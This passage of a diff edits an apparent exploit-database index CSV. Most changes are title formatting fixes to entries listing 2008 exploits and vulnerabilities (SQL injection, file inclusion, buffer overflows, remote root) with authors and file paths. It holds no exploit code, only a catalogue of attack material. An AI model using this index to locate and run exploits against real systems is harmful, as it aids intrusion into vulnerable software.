(RFI/XSS/RCE) Multiple Vulnerabilities",2008-02-26,NBBN,php,webapps,0 5195,platforms/php/webapps/5195.txt,"Mambo Component Simpleboard 1.0.3 (catid) SQL Injection Vulnerability",2008-02-27,"it's my",php,webapps,0 @@ -4836,7 +4836,7 @@ id,file,description,date,author,platform,type,port 5198,platforms/php/webapps/5198.txt,"Koobi Pro 5.7 (categ) Remote SQL Injection Vulnerability",2008-02-28,Cr@zy_King,php,webapps,0 5199,platforms/php/webapps/5199.txt,"SiteBuilderElite 1.2 - Multiple Remote File Inclusion Vulnerabilities",2008-02-28,MhZ91,php,webapps,0 5200,platforms/php/webapps/5200.txt,"Podcast Generator <= 1.0 BETA 2 RFI / File Disclosure Vulnerabilities",2008-02-28,GoLd_M,php,webapps,0 -5201,platforms/windows/dos/5201.txt,"Crysis <= 1.1.1.5879 Remote Format String Denial of Service PoC",2008-02-28,"Long Poke",windows,dos,0 +5201,platforms/windows/dos/5201.txt,"Crysis <= 1.1.1.5879 - Remote Format String Denial of Service PoC",2008-02-28,"Long Poke",windows,dos,0 5202,platforms/php/webapps/5202.txt,"barryvan compo manager 0.5pre-1 - Remote File Inclusion Vulnerability",2008-02-28,MhZ91,php,webapps,0 5203,platforms/php/webapps/5203.txt,"PHP-Nuke My_eGallery <= 2.7.9 - Remote SQL Injection Vulnerability",2008-02-28,"Aria-Security Team",php,webapps,0 5204,platforms/php/webapps/5204.py,"Centreon <= 1.4.2.3 (get_image.php) Remote File Disclosure Exploit",2008-02-28,"Julien CAYSSOL",php,webapps,0 @@ -4858,7 +4858,7 @@ id,file,description,date,author,platform,type,port 5220,platforms/php/webapps/5220.php,"zKup CMS 2.0 <= 2.3 - Remote Upload Exploit",2008-03-07,"Charles Fol",php,webapps,0 5221,platforms/php/webapps/5221.txt,"Joomla Component Candle 1.0 (cID) SQL Injection Vulnerability",2008-03-08,S@BUN,php,webapps,0 5222,platforms/php/webapps/5222.txt,"QuickTicket <= 1.5 (qti_usr.php id) SQL Injection Vulnerability",2008-03-09,croconile,php,webapps,0 -5223,platforms/php/webapps/5223.txt,"BM Classifieds <= 20080409 Multiple SQL Injection Vulnerabilities",2008-03-09,xcorpitx,php,webapps,0 +5223,platforms/php/webapps/5223.txt,"BM Classifieds <= 20080409 - Multiple SQL Injection Vulnerabilities",2008-03-09,xcorpitx,php,webapps,0 5224,platforms/linux/remote/5224.php,"VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit",2008-03-09,DarkFig,linux,remote,0 5225,platforms/windows/dos/5225.html,"KingSoft UpdateOcx2.dll SetUninstallName() Heap Overflow PoC",2008-03-10,void,windows,dos,0 5226,platforms/php/webapps/5226.txt,"Mambo Component eWriting 1.2.1 (cat) SQL Injection Vulnerability",2008-03-10,Don,php,webapps,0 @@ -4869,7 +4869,7 @@ id,file,description,date,author,platform,type,port 5231,platforms/php/webapps/5231.php,"phpMyNewsletter <= 0.8b5 (archives.php msg_id) SQL Injection Exploit",2008-03-10,"Charles Fol",php,webapps,0 5232,platforms/php/webapps/5232.txt,"Mapbender <= 2.4.4 (mapFiler.php) Remote Code Execution Vulnerability",2008-03-11,"RedTeam Pentesting",php,webapps,0 5233,platforms/php/webapps/5233.txt,"Mapbender 2.4.4 - (gaz) Remote SQL Injection Vulnerability",2008-03-11,"RedTeam Pentesting",php,webapps,0 -5234,platforms/php/webapps/5234.txt,"Bloo <= 1.00 Multiple Remote SQL Injection Vulnerabilities",2008-03-11,MhZ91,php,webapps,0 +5234,platforms/php/webapps/5234.txt,"Bloo <= 1.00 - Multiple Remote SQL Injection Vulnerabilities",2008-03-11,MhZ91,php,webapps,0 5235,platforms/windows/dos/5235.py,"MailEnable SMTP Service - VRFY/EXPN Command Buffer Overflow DoS",2008-03-11,ryujin,windows,dos,0 5236,platforms/php/webapps/5236.txt,"phpBB Mod FileBase (id) Remote SQL Injection Vulnerability",2008-03-11,t0pP8uZz,php,webapps,0 5237,platforms/php/webapps/5237.txt,"Joomla Component ProductShowcase <= 1.5 - SQL Injection Vulnerability",2008-03-11,S@BUN,php,webapps,0 @@ -4897,13 +4897,13 @@ id,file,description,date,author,platform,type,port 5260,platforms/php/webapps/5260.txt,"fuzzylime cms <= 3.01 (admindir) Remote File Inclusion Vulnerability",2008-03-14,irk4z,php,webapps,0 5261,platforms/windows/dos/5261.py,"Rosoft Media Player 4.1.8 RML Stack Based Buffer Overflow PoC",2008-03-15,"Wiktor Sierocinski",windows,dos,0 5262,platforms/php/webapps/5262.txt,"mutiple timesheets <= 5.0 - Multiple Vulnerabilities",2008-03-16,JosS,php,webapps,0 -5263,platforms/php/webapps/5263.txt,"phpBP <= RC3 (2.204) FIX4 Remote SQL Injection Vulnerability",2008-03-16,irk4z,php,webapps,0 +5263,platforms/php/webapps/5263.txt,"phpBP <= RC3 (2.204) FIX4 - Remote SQL Injection Vulnerability",2008-03-16,irk4z,php,webapps,0 5264,platforms/windows/remote/5264.html,"CA BrightStor ARCserve Backup r11.5 ActiveX Remote BOF Exploit",2008-03-16,h07,windows,remote,0 5265,platforms/php/webapps/5265.txt,"Exero CMS 1.0.1 (theme) Multiple Local File Inclusion Vulnerabilities",2008-03-17,GoLd_M,php,webapps,0 -5266,platforms/php/webapps/5266.txt,"PHPauction GPL Enhanced 2.51 Multiple RFI Vulnerabilities",2008-03-17,RoMaNcYxHaCkEr,php,webapps,0 -5267,platforms/php/webapps/5267.txt,"XOOPS Module Dictionary <= 0.94 Remote SQL Injection Vulnerability",2008-03-17,S@BUN,php,webapps,0 +5266,platforms/php/webapps/5266.txt,"PHPauction GPL Enhanced 2.51 - Multiple RFI Vulnerabilities",2008-03-17,RoMaNcYxHaCkEr,php,webapps,0 +5267,platforms/php/webapps/5267.txt,"XOOPS Module Dictionary <= 0.94 - Remote SQL Injection Vulnerability",2008-03-17,S@BUN,php,webapps,0 5268,platforms/multiple/dos/5268.html,"Apple Safari (webkit) Remote Denial of Service Exploit (iphone/osx/win)",2008-03-17,"Georgi Guninski",multiple,dos,0 -5269,platforms/windows/remote/5269.txt,"mg-soft net inspector 6.5.0.828 Multiple Vulnerabilities",2008-03-17,"Luigi Auriemma",windows,remote,0 +5269,platforms/windows/remote/5269.txt,"mg-soft net inspector 6.5.0.828 - Multiple Vulnerabilities",2008-03-17,"Luigi Auriemma",windows,remote,0 5270,platforms/windows/dos/5270.pl,"Home FTP Server 1.4.5 - Remote Denial of Service Exploit",2008-03-17,0in,windows,dos,0 5273,platforms/php/webapps/5273.txt,"Joomla Component Acajoom (com_acajoom) SQL Injection Vulnerability",2008-03-18,fataku,php,webapps,0 5274,platforms/asp/webapps/5274.txt,"KAPhotoservice (album.asp) Remote SQL Injection Exploit",2008-03-18,JosS,asp,webapps,0 @@ -4911,7 +4911,7 @@ id,file,description,date,author,platform,type,port 5276,platforms/asp/webapps/5276.txt,"ASPapp (links.asp CatId) Remote SQL Injection Vulnerability",2008-03-19,xcorpitx,asp,webapps,0 5277,platforms/php/webapps/5277.txt,"Joomla Component joovideo 1.2.2 (id) SQL Injection Vulnerability",2008-03-19,S@BUN,php,webapps,0 5278,platforms/php/webapps/5278.txt,"Joomla Component Alberghi <= 2.1.3 (id) SQL Injection Vulnerability",2008-03-19,S@BUN,php,webapps,0 -5279,platforms/php/webapps/5279.txt,"Mambo Component accombo 1.x (id) SQL Injection Vulnerability",2008-03-19,S@BUN,php,webapps,0 +5279,platforms/php/webapps/5279.txt,"Mambo Component accombo 1.x - (id) SQL Injection Vulnerability",2008-03-19,S@BUN,php,webapps,0 5280,platforms/php/webapps/5280.txt,"Joomla Component Restaurante 1.0 (id) SQL Injection Vulnerability",2008-03-19,S@BUN,php,webapps,0 5281,platforms/php/webapps/5281.php,"PEEL CMS Admin Hash Extraction and Remote Upload Exploit",2008-03-19,"Charles Fol",php,webapps,0 5282,platforms/solaris/remote/5282.txt,"Sun Solaris <= 10 rpc.ypupdated Remote Root Exploit",2008-03-20,kingcope,solaris,remote,0 @@ -4919,7 +4919,7 @@ id,file,description,date,author,platform,type,port 5285,platforms/php/webapps/5285.txt,"RunCMS Module section (artid) Remote SQL Injection Vulnerability",2008-03-20,Cr@zy_King,php,webapps,0 5286,platforms/php/webapps/5286.txt,"ASPapp Knowledge Base Remote SQL Injection Vulnerability",2008-03-20,xcorpitx,php,webapps,0 5287,platforms/windows/local/5287.txt,"Microsoft Office Excel - Code Execution Exploit (MS08-014)",2008-03-21,zha0,windows,local,0 -5288,platforms/php/webapps/5288.txt,"phpAddressBook 2.11 Multiple Local File Inclusion Vulnerabilities",2008-03-21,0x90,php,webapps,0 +5288,platforms/php/webapps/5288.txt,"phpAddressBook 2.11 - Multiple Local File Inclusion Vulnerabilities",2008-03-21,0x90,php,webapps,0 5289,platforms/hardware/remote/5289.txt,"ZyXEL ZyWALL Quagga/Zebra (default pass) Remote Root Vulnerability",2008-03-21,"Pranav Joshi",hardware,remote,0 5290,platforms/php/webapps/5290.txt,"RunCMS Module Photo 3.02 (cid) Remote SQL Injection Vulnerability",2008-03-21,S@BUN,php,webapps,0 5291,platforms/php/webapps/5291.txt,"D.E. Classifieds (cat_id) Remote SQL Injection Vulnerability",2008-03-21,S@BUN,php,webapps,0 @@ -4948,7 +4948,7 @@ id,file,description,date,author,platform,type,port 5314,platforms/windows/remote/5314.py,"TFTP Server for Windows 1.4 - ST Buffer Overflow Exploit (0day)",2008-03-26,muts,windows,remote,69 5315,platforms/windows/remote/5315.py,"Quick TFTP Pro 2.1 - Remote SEH Overflow Exploit (0day)",2008-03-26,muts,windows,remote,69 5316,platforms/windows/dos/5316.py,"PacketTrap Networks pt360 2.0.39 TFTPD - Remote DoS Exploit",2008-03-26,muts,windows,dos,0 -5317,platforms/php/webapps/5317.txt,"JAF-CMS 4.0 RC2 Multiple Remote File Inclusion Vulnerabilities",2008-03-26,CraCkEr,php,webapps,0 +5317,platforms/php/webapps/5317.txt,"JAF-CMS 4.0 RC2 - Multiple Remote File Inclusion Vulnerabilities",2008-03-26,CraCkEr,php,webapps,0 5318,platforms/php/webapps/5318.txt,"Joomla Component MyAlbum 1.0 (album) SQL Injection Vulnerability",2008-03-28,parad0x,php,webapps,0 5319,platforms/php/webapps/5319.pl,"AuraCMS 2.x (user.php) Security Code Bypass / Add Administrator Exploit",2008-03-28,NTOS-Team,php,webapps,0 5320,platforms/windows/local/5320.txt,"Microsoft Office XP SP3 - PPT File Buffer Overflow Exploit (MS08-016)",2008-03-30,Marsu,windows,local,0 @@ -4971,7 +4971,7 @@ id,file,description,date,author,platform,type,port 5337,platforms/php/webapps/5337.txt,"Joomla Component actualite 1.0 (id) SQL Injection Vulnerability",2008-04-01,Stack,php,webapps,0 5338,platforms/windows/remote/5338.html,"ChilkatHttp ActiveX 2.3 Arbitrary Files Overwrite Exploit",2008-04-01,shinnai,windows,remote,0 5339,platforms/php/webapps/5339.php,"Nuked-Klan <= 1.7.6 - Multiple Vulnerabilities Exploit",2008-04-01,"Charles Fol",php,webapps,0 -5340,platforms/php/webapps/5340.txt,"RunCMS Module bamagalerie3 Remote SQL Injection Vulnerability",2008-04-01,DreamTurk,php,webapps,0 +5340,platforms/php/webapps/5340.txt,"RunCMS Module bamagalerie3 - Remote SQL Injection Vulnerability",2008-04-01,DreamTurk,php,webapps,0 5341,platforms/windows/dos/5341.pl,"Noticeware Email Server 4.6.1.0 - Denial of Service Exploit",2008-04-01,Ray,windows,dos,0 5342,platforms/windows/remote/5342.py,"HP OpenView NNM 7.5.1 - OVAS.exe SEH PRE AUTH Overflow Exploit",2008-04-02,muts,windows,remote,7510 5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 FrameworkService.exe Remote Denial of Service Exploit",2008-04-02,muts,windows,dos,0 @@ -4992,7 +4992,7 @@ id,file,description,date,author,platform,type,port 5358,platforms/php/webapps/5358.pl,"XPOZE Pro <= 3.05 (reed) Remote SQL Injection Exploit",2008-04-04,t0pP8uZz,php,webapps,0 5359,platforms/php/webapps/5359.txt,"Vastal I-Tech Software Zone (cat_id) SQL Injection Vulnerability",2008-04-04,t0pP8uZz,php,webapps,0 5360,platforms/php/webapps/5360.txt,"sabros.us 1.75 (thumbnails.php) Remote File Disclosure Vulnerability",2008-04-04,HaCkeR_EgY,php,webapps,0 -5361,platforms/windows/local/5361.py,"MS Visual Basic Enterprise Ed. 6 SP6 DSR File Local BOF Exploit",2008-04-04,shinnai,windows,local,0 +5361,platforms/windows/local/5361.py,"Microsoft Visual Basic Enterprise Ed. 6 SP6 DSR File Local BOF Exploit",2008-04-04,shinnai,windows,local,0 5362,platforms/php/webapps/5362.txt,"Comdev News Publisher Remote SQL Injection Vulnerability",2008-04-04,t0pP8uZz,php,webapps,0 5363,platforms/php/webapps/5363.txt,"Affiliate Directory (cat_id) Remote SQL Injection Vulnerbility",2008-04-04,t0pP8uZz,php,webapps,0 5364,platforms/php/webapps/5364.txt,"PHP Photo Gallery 1.0 (photo_id) SQL Injection Vulnerability",2008-04-04,t0pP8uZz,php,webapps,0 @@ -5022,22 +5022,22 @@ id,file,description,date,author,platform,type,port 5388,platforms/php/webapps/5388.txt,"Prozilla Topsites 1.0 Arbitrary Edit/Add Users Vulnerability",2008-04-06,t0pP8uZz,php,webapps,0 5389,platforms/php/webapps/5389.txt,"Prozilla Cheat Script 2.0 (id) Remote SQL Injection Vulnerability",2008-04-06,t0pP8uZz,php,webapps,0 5390,platforms/php/webapps/5390.txt,"Prozilla Freelancers (project) Remote SQL Injection Vulnerability",2008-04-07,t0pP8uZz,php,webapps,0 -5391,platforms/php/webapps/5391.php,"Drake CMS <= 0.4.11 Remote Blind SQL Injection Exploit",2008-04-07,EgiX,php,webapps,0 +5391,platforms/php/webapps/5391.php,"Drake CMS <= 0.4.11 - Remote Blind SQL Injection Exploit",2008-04-07,EgiX,php,webapps,0 5392,platforms/php/webapps/5392.php,"LinPHA <= 1.3.3 (maps plugin) Remote Command Execution Exploit",2008-04-07,EgiX,php,webapps,0 5393,platforms/php/webapps/5393.txt,"Dragoon 0.1 (root) Remote File Inclusion Vulnerability",2008-04-07,RoMaNcYxHaCkEr,php,webapps,0 5394,platforms/php/webapps/5394.txt,"Mole 2.1.0 (viewsource.php) Remote File Disclosure Vulnerability",2008-04-07,GoLd_M,php,webapps,0 5395,platforms/windows/remote/5395.html,"Data Dynamics ActiveBar (Actbar3.ocx 3.2) Multiple Insecure Methods",2008-04-07,shinnai,windows,remote,0 -5396,platforms/windows/dos/5396.txt,"hp openview nnm 7.53 Multiple Vulnerabilities",2008-04-07,"Luigi Auriemma",windows,dos,0 +5396,platforms/windows/dos/5396.txt,"hp openview nnm 7.53 - Multiple Vulnerabilities",2008-04-07,"Luigi Auriemma",windows,dos,0 5397,platforms/windows/remote/5397.txt,"CDNetworks Nefficient Download (NeffyLauncher.dll) Code Execution Vuln",2008-04-07,"Simon Ryeo",windows,remote,0 5398,platforms/windows/remote/5398.html,"Tumbleweed SecureTransport FileTransfer ActiveX BOF Exploit",2008-04-07,"Patrick Webster",windows,remote,0 5399,platforms/php/webapps/5399.txt,"ChartDirector 4.1 (viewsource.php file) File Disclosure Vulnerability",2008-04-07,Stack,php,webapps,0 5400,platforms/php/webapps/5400.txt,"724CMS <= 4.01 Enterprise (index.php ID) SQL Injection Vulnerability",2008-04-07,Lidloses_Auge,php,webapps,0 5401,platforms/php/webapps/5401.txt,"My Gaming Ladder <= 7.5 (ladderid) SQL Injection Vulnerability",2008-04-07,t0pP8uZz,php,webapps,0 5402,platforms/php/webapps/5402.txt,"iScripts SocialWare (id) Remote SQL Injection Vulnerbility",2008-04-07,t0pP8uZz,php,webapps,0 -5404,platforms/php/webapps/5404.php,"phpTournois <= G4 Remote File Upload/Code Execution Exploit",2008-04-08,"Charles Fol",php,webapps,0 +5404,platforms/php/webapps/5404.php,"phpTournois <= G4 - Remote File Upload/Code Execution Exploit",2008-04-08,"Charles Fol",php,webapps,0 5405,platforms/php/webapps/5405.txt,"exbb <= 0.22 (lfi/rfi) Multiple Vulnerabilities",2008-04-08,The:Paradox,php,webapps,0 5406,platforms/php/webapps/5406.txt,"Pligg CMS 9.9.0 (editlink.php id) Remote SQL Injection Vulnerability",2008-04-08,"Guido Landi",php,webapps,0 -5407,platforms/php/webapps/5407.php,"FLABER <= 1.1 RC1 Remote Command Execution Exploit",2008-04-08,EgiX,php,webapps,0 +5407,platforms/php/webapps/5407.php,"FLABER <= 1.1 RC1 - Remote Command Execution Exploit",2008-04-08,EgiX,php,webapps,0 5408,platforms/php/webapps/5408.pl,"LokiCMS <= 0.3.3 - Remote Command Execution Exploit",2008-04-08,girex,php,webapps,0 5409,platforms/asp/webapps/5409.txt,"SuperNET Shop 1.0 - Remote SQL Injection Vulnerabilities",2008-04-08,U238,asp,webapps,0 5410,platforms/php/webapps/5410.txt,"Prediction Football 1.x (matchid) Remote SQL Injection Vulnerability",2008-04-08,0in,php,webapps,0 @@ -5060,7 +5060,7 @@ id,file,description,date,author,platform,type,port 5427,platforms/windows/dos/5427.pl,"Borland InterBase 2007 - ibserver.exe Buffer Overflow PoC",2008-04-11,"Liu Zhen Hua",windows,dos,0 5428,platforms/php/webapps/5428.txt,"PHPKB 1.5 Knowledge Base (ID) SQL Injection Vulnerability",2008-04-11,parad0x,php,webapps,0 5429,platforms/php/webapps/5429.txt,"newsoffice 1.1 - Remote File Inclusion Vulnerability",2008-04-11,RoMaNcYxHaCkEr,php,webapps,0 -5430,platforms/multiple/remote/5430.txt,"HP OpenView Network Node Manager <= 7.53 Multiple Vulnerabilities",2008-04-11,"Luigi Auriemma",multiple,remote,0 +5430,platforms/multiple/remote/5430.txt,"HP OpenView Network Node Manager <= 7.53 - Multiple Vulnerabilities",2008-04-11,"Luigi Auriemma",multiple,remote,0 5431,platforms/php/webapps/5431.txt,"Joomla Component joomlaXplorer <= 1.6.2 - Remote Vulnerabilities",2008-04-11,Houssamix,php,webapps,0 5432,platforms/php/webapps/5432.txt,"phpAddressBook 2.11 (view.php id) SQL Injection Vulnerability",2008-04-11,Cr@zy_King,php,webapps,0 5433,platforms/php/webapps/5433.txt,"CcMail <= 1.0.1 Insecure Cookie Handling Vulnerability",2008-04-12,t0pP8uZz,php,webapps,0 @@ -5070,7 +5070,7 @@ id,file,description,date,author,platform,type,port 5437,platforms/php/webapps/5437.txt,"cpcommerce 1.1.0 (xss/lfi) Multiple Vulnerabilities",2008-04-13,BugReport.IR,php,webapps,0 5438,platforms/windows/dos/5438.py,"XM Easy Personal FTP Server 5.4.0 (XCWD) Denial of Service Exploit",2008-04-13,j0rgan,windows,dos,0 5439,platforms/php/webapps/5439.txt,"PostCard 1.0 - Remote Insecure Cookie Handling Vulnerability",2008-04-13,t0pP8uZz,php,webapps,0 -5440,platforms/php/webapps/5440.php,"Mumbo Jumbo Media OP4 Remote Blind SQL Injection Exploit",2008-04-13,Lidloses_Auge,php,webapps,0 +5440,platforms/php/webapps/5440.php,"Mumbo Jumbo Media OP4 - Remote Blind SQL Injection Exploit",2008-04-13,Lidloses_Auge,php,webapps,0 5441,platforms/php/webapps/5441.txt,"SmallBiz 4 Seasons CMS Remote SQL Injection Vulnerability",2008-04-14,cO2,php,webapps,0 5442,platforms/windows/local/5442.cpp,"Microsoft Windows GDI - Image Parsing Stack Overflow Exploit (MS08-021)",2008-04-14,Lamhtz,windows,local,0 5443,platforms/php/webapps/5443.txt,"SmallBiz eShop (content_id) Remote SQL Injection Vulnerability",2008-04-14,Stack,php,webapps,0 @@ -5100,7 +5100,7 @@ id,file,description,date,author,platform,type,port 5467,platforms/php/webapps/5467.txt,"PhShoutBox <= 1.5 (final) Insecure Cookie Handling Vulnerability",2008-04-18,t0pP8uZz,php,webapps,0 5468,platforms/php/webapps/5468.txt,"Simple Customer 1.2 (contact.php id) SQL Injection Vulnerability",2008-04-18,t0pP8uZz,php,webapps,0 5469,platforms/php/webapps/5469.txt,"AllMyGuests <= 0.4.1 (AMG_id) Remote SQL Injection Vulnerability",2008-04-19,Player,php,webapps,0 -5470,platforms/php/webapps/5470.py,"PHP-Fusion <= 6.01.14 Remote Blind SQL Injection Exploit",2008-04-19,The:Paradox,php,webapps,0 +5470,platforms/php/webapps/5470.py,"PHP-Fusion <= 6.01.14 - Remote Blind SQL Injection Exploit",2008-04-19,The:Paradox,php,webapps,0 5471,platforms/php/webapps/5471.txt,"Apartment Search Script (listtest.php r) SQL Injection Vulnerability",2008-04-19,Crackers_Child,php,webapps,0 5472,platforms/windows/dos/5472.py,"SubEdit Player build 4066 subtitle Buffer Overflow PoC",2008-04-19,grzdyl,windows,dos,0 5473,platforms/php/webapps/5473.pl,"XOOPS Module Recipe (detail.php id) SQL Injection Vulnerability",2008-04-19,S@BUN,php,webapps,0 @@ -5133,7 +5133,7 @@ id,file,description,date,author,platform,type,port 5500,platforms/php/webapps/5500.txt,"PostNuke Module pnFlashGames <= 2.5 - SQL Injection Vulnerabilities",2008-04-26,Kacper,php,webapps,0 5501,platforms/php/webapps/5501.txt,"Content Management System for Phprojekt 0.6.1 RFI Vulnerabiltiies",2008-04-26,RoMaNcYxHaCkEr,php,webapps,0 5502,platforms/php/webapps/5502.pl,"Clever Copy 3.0 (postview.php) Remote SQL Injection Exploit",2008-04-26,U238,php,webapps,0 -5503,platforms/asp/webapps/5503.txt,"Angelo-Emlak 1.0 - Multiple Remote SQL injection Vulnerabilities",2008-04-26,U238,asp,webapps,0 +5503,platforms/asp/webapps/5503.txt,"Angelo-Emlak 1.0 - Multiple Remote SQL Injection Vulnerabilities",2008-04-26,U238,asp,webapps,0 5504,platforms/php/webapps/5504.txt,"PHP Forge <= 3 beta 2 (id) Remote SQL Injection Vulnerability",2008-04-26,JIKO,php,webapps,0 5505,platforms/php/webapps/5505.txt,"RunCMS Module MyArticles 0.6 Beta-1 SQL Injection Vulnerability",2008-04-26,Cr@zy_King,php,webapps,0 5506,platforms/php/webapps/5506.txt,"PHPizabi 0.848b C1 HFP3 - Database Information Disclosure Vuln",2008-04-26,YOUCODE,php,webapps,0 @@ -5164,7 +5164,7 @@ id,file,description,date,author,platform,type,port 5531,platforms/php/webapps/5531.txt,"Open Auto Classifieds 1.4.3b Remote SQL Injection Vulnerabilities",2008-05-02,InjEctOr5,php,webapps,0 5532,platforms/php/webapps/5532.txt,"ItCMS 1.9 (boxpop.php) Remote Code Execution Vulnerability",2008-05-02,Cod3rZ,php,webapps,0 5533,platforms/php/webapps/5533.txt,"BlogMe PHP (comments.php id) SQL Injection Vulnerability",2008-05-03,His0k4,php,webapps,0 -5534,platforms/multiple/remote/5534.txt,"HLDS WebMod 0.48 Multiple Remote Vulnerabilties",2008-05-03,"Luigi Auriemma",multiple,remote,0 +5534,platforms/multiple/remote/5534.txt,"HLDS WebMod 0.48 - Multiple Remote Vulnerabilties",2008-05-03,"Luigi Auriemma",multiple,remote,0 5535,platforms/php/webapps/5535.txt,"Smartblog (index.php tid) Remote SQL Injection Vulnerability",2008-05-03,His0k4,php,webapps,0 5536,platforms/windows/remote/5536.php,"HLDS WebMod 0.48 (rconpass) Remote Heap Overflow Exploit",2008-05-03,SkOd,windows,remote,0 5537,platforms/php/webapps/5537.txt,"phpDirectorySource 1.1 - Multiple Remote SQL Injection Vulnerabilities",2008-05-03,InjEctOr5,php,webapps,0 @@ -5180,7 +5180,7 @@ id,file,description,date,author,platform,type,port 5547,platforms/windows/dos/5547.txt,"Novell eDirectory < 8.7.3 SP 10 / 8.8.2 - HTTP headers DoS Vulnerability",2008-05-05,Nicob,windows,dos,0 5548,platforms/php/webapps/5548.txt,"Miniweb 2.0 (historymonth) Remote SQL Injection Vulnerability",2008-05-05,HaCkeR_EgY,php,webapps,0 5549,platforms/php/webapps/5549.txt,"Power Editor 2.0 - Remote File Disclosure / Edit Vulnerability",2008-05-05,"Virangar Security",php,webapps,0 -5550,platforms/php/webapps/5550.php,"deluxebb <= 1.2 - Multiple Vulnerabilities exploit",2008-05-05,EgiX,php,webapps,0 +5550,platforms/php/webapps/5550.php,"deluxebb <= 1.2 - Multiple Vulnerabilities Exploit",2008-05-05,EgiX,php,webapps,0 5551,platforms/php/webapps/5551.txt,"Pre Shopping Mall 1.1 (search.php search) SQL Injection Vulnerability",2008-05-06,t0pP8uZz,php,webapps,0 5552,platforms/php/webapps/5552.txt,"PHPEasyData 1.5.4 (cat_id) Remote SQL Injection Vulnerability",2008-05-06,InjEctOr5,php,webapps,0 5553,platforms/asp/webapps/5553.txt,"fipsCMS (print.asp lg) Remote SQL Injection Vulnerability",2008-05-07,InjEctOr5,asp,webapps,0 @@ -5218,9 +5218,9 @@ id,file,description,date,author,platform,type,port 5591,platforms/php/webapps/5591.txt,"AJ Auction <= 6.2.1 - (classifide_ad.php) SQL Injection Vulnerability",2008-05-12,t0pP8uZz,php,webapps,0 5592,platforms/php/webapps/5592.txt,"AJ Classifieds 2008 (index.php) Remote SQL Injection Vulnerability",2008-05-12,t0pP8uZz,php,webapps,0 5594,platforms/php/webapps/5594.txt,"ZeusCart <= 2.0 (category_list.php) SQL Injection Vulnerability",2008-05-12,t0pP8uZz,php,webapps,0 -5595,platforms/php/webapps/5595.txt,"clanlite 2.x (SQL Injection/xss) Multiple Vulnerabilities",2008-05-12,ZoRLu,php,webapps,0 +5595,platforms/php/webapps/5595.txt,"clanlite 2.x - (SQL Injection/xss) Multiple Vulnerabilities",2008-05-12,ZoRLu,php,webapps,0 5596,platforms/php/webapps/5596.txt,"BIGACE 2.4 - Multiple Remote File Inclusion Vulnerabilities",2008-05-12,BiNgZa,php,webapps,0 -5597,platforms/php/webapps/5597.pl,"Battle.net Clan Script <= 1.5.x Remote SQL Injection Exploit",2008-05-12,Stack,php,webapps,0 +5597,platforms/php/webapps/5597.pl,"Battle.net Clan Script <= 1.5.x - Remote SQL Injection Exploit",2008-05-12,Stack,php,webapps,0 5598,platforms/php/webapps/5598.txt,"Mega File Hosting Script 1.2 (fid) Remote SQL Injection Vulnerability",2008-05-12,TurkishWarriorr,php,webapps,0 5599,platforms/php/webapps/5599.txt,"PHP Classifieds Script <= 05122008 SQL Injection Vulnerabilities",2008-05-12,InjEctOr5,php,webapps,0 5600,platforms/php/webapps/5600.php,"CMS Made Simple <= 1.2.4 (FileManager module) File Upload Exploit",2008-05-12,EgiX,php,webapps,0 @@ -5242,7 +5242,7 @@ id,file,description,date,author,platform,type,port 5616,platforms/php/webapps/5616.txt,"ActiveKB <= 1.5 Insecure Cookie Handling/Arbitrary Admin Access",2008-05-14,t0pP8uZz,php,webapps,0 5617,platforms/php/webapps/5617.txt,"Internet Photoshow (Special Edition) Insecure Cookie Handling Vuln",2008-05-14,t0pP8uZz,php,webapps,0 5618,platforms/php/webapps/5618.txt,"La-Nai CMS <= 1.2.16 (fckeditor) Arbitrary File Upload Exploit",2008-05-14,EgiX,php,webapps,0 -5619,platforms/windows/remote/5619.html,"MS Internet Explorer (Print Table of Links) Cross-Zone Scripting PoC",2008-05-14,"Aviv Raff",windows,remote,0 +5619,platforms/windows/remote/5619.html,"Microsoft Internet Explorer (Print Table of Links) Cross-Zone Scripting PoC",2008-05-14,"Aviv Raff",windows,remote,0 5620,platforms/php/webapps/5620.txt,"rgboard <= 3.0.12 (rfi/xss) Multiple Vulnerabilities",2008-05-14,e.wiZz!,php,webapps,0 5621,platforms/php/webapps/5621.txt,"Kostenloses Linkmanagementscript (page_to_include) RFI Vulnerability",2008-05-14,HaCkeR_EgY,php,webapps,0 5622,platforms/multiple/remote/5622.txt,"Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit",2008-05-15,"Markus Mueller",multiple,remote,22 @@ -5316,15 +5316,15 @@ id,file,description,date,author,platform,type,port 5691,platforms/php/webapps/5691.php,"CMS from Scratch <= 1.1.3 (fckeditor) Remote Shell Upload Exploit",2008-05-29,EgiX,php,webapps,0 5692,platforms/php/webapps/5692.pl,"Mambo Component mambads <= 1.0 RC1 Beta SQL Injection Vulnerability",2008-05-29,Houssamix,php,webapps,0 5693,platforms/php/webapps/5693.txt,"CMS from Scratch <= 1.1.3 (image.php) Directory Traversal Vulnerability",2008-05-29,Stack,php,webapps,0 -5694,platforms/windows/remote/5694.cpp,"ASUS DPC Proxy 2.0.0.16/19 Remote Buffer Overflow Exploit",2008-05-29,Heretic2,windows,remote,623 -5695,platforms/windows/remote/5695.cpp,"Now SMS/MMS Gateway 5.5 - Remote Buffer Overflow Exploit",2008-05-29,Heretic2,windows,remote,8800 +5694,platforms/windows/remote/5694.cpp,"ASUS DPC Proxy 2.0.0.16/19 - Remote Buffer Overflow Exploit",2008-05-29,Heretic2,windows,remote,623 +5695,platforms/windows/remote/5695.cpp,"Now SMS/Mms Gateway 5.5 - Remote Buffer Overflow Exploit",2008-05-29,Heretic2,windows,remote,8800 5696,platforms/php/webapps/5696.pl,"PHP Booking Calendar 10 d Remote SQL Injection Exploit",2008-05-29,Stack,php,webapps,0 5697,platforms/php/webapps/5697.php,"PHP Booking Calendar 10 d (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0 5698,platforms/php/webapps/5698.txt,"HiveMaker Professional <= 1.0.2 (cid) SQL Injection Vulnerability",2008-05-30,K-159,php,webapps,0 5699,platforms/php/webapps/5699.txt,"PsychoStats <= 2.3.3 - Multiple Remote SQL Injection Vulnerabilities",2008-05-31,Mr.SQL,php,webapps,0 5700,platforms/php/webapps/5700.htm,"CMSimple 3.1 - Local File Inclusion / Arbitrary File Upload Exploit",2008-05-31,irk4z,php,webapps,0 5701,platforms/php/webapps/5701.txt,"Social Site Generator (sgc_id) Remote SQL Injection Vulnerability",2008-05-31,"DeAr Ev!L",php,webapps,0 -5702,platforms/php/webapps/5702.txt,"azuresites cms Multiple 